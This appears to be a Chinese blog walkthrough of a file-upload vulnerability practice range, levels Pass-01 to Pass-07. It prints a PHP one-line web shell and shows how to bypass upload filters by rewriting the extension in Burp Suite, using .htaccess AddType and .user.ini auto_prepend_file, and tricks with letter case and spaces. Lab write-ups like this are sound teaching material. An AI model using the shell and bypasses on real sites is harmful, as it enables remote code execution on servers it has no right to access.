文件上传漏洞靶场
Pass-01
)
前端检测
onsumbit=checkFile()
:调用js函数来检查上传文件的扩展名。
<?php
@eval($_POST['cmd']);
?>
修改后缀名为jpg,burpsuit抓包改后缀名改为php。
Pass-02
后端检测
做法同Pass-01
Pass-03
黑名单限制
burpsuit抓包改后缀名改为phtml。
Pass-04
黑名单限制大部分后缀
.htaccess文件
(分布式配置文件):提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。
创建一个.hatacess
文件上传
AddType application/x-httpd-php .jpg
无论什么文件只要包含了jpg都视为php来解析
在上传带有一句话木马的jpg文件
Pass-05
法一:在php后面加上“。。”
法二:.user.ini
文件:php.ini
是php的全局配置文件,对整个web服务起作用,.user.ini
和.htaccess
都是目录的配置文件,.user.ini
是用户自定义的php.ini
。
在.user.ini
中写入auto_prepend_file=attack.png
Pass-06
大小写绕过
Pass-07
空格绕过
All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.